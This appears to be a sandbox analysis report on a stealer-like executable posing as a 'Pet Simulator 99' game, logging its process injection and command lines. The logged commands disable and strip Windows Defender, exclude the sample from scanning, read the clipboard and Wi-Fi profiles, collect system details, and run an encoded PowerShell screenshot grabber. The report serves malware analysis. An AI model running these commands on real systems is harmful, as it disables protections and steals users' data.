Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2600 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe
PID 2600 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe
PID 4116 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 3708 wrote to memory of 1488 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3708 wrote to memory of 1488 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3452 wrote to memory of 4704 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3452 wrote to memory of 4704 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4116 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 3816 wrote to memory of 2952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3816 wrote to memory of 2952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2456 wrote to memory of 4948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2456 wrote to memory of 4948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4116 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 1924 wrote to memory of 2756 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1924 wrote to memory of 2756 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1556 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1556 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1564 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1564 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1056 wrote to memory of 3164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1056 wrote to memory of 3164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3632 wrote to memory of 3544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3632 wrote to memory of 3544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 5112 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5112 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4004 wrote to memory of 2240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4004 wrote to memory of 2240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4116 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 3720 wrote to memory of 412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3720 wrote to memory of 412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4116 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 3280 wrote to memory of 3756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3280 wrote to memory of 3756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4116 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 2560 wrote to memory of 3360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2560 wrote to memory of 3360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4116 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4116 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 2748 wrote to memory of 2312 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2748 wrote to memory of 2312 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1908 wrote to memory of 3056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1908 wrote to memory of 3056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com

Processes

C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe

"C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe"

C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe

"C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wk133bt4\wk133bt4.cmdline"

C:\Windows\system32\cmd.exe

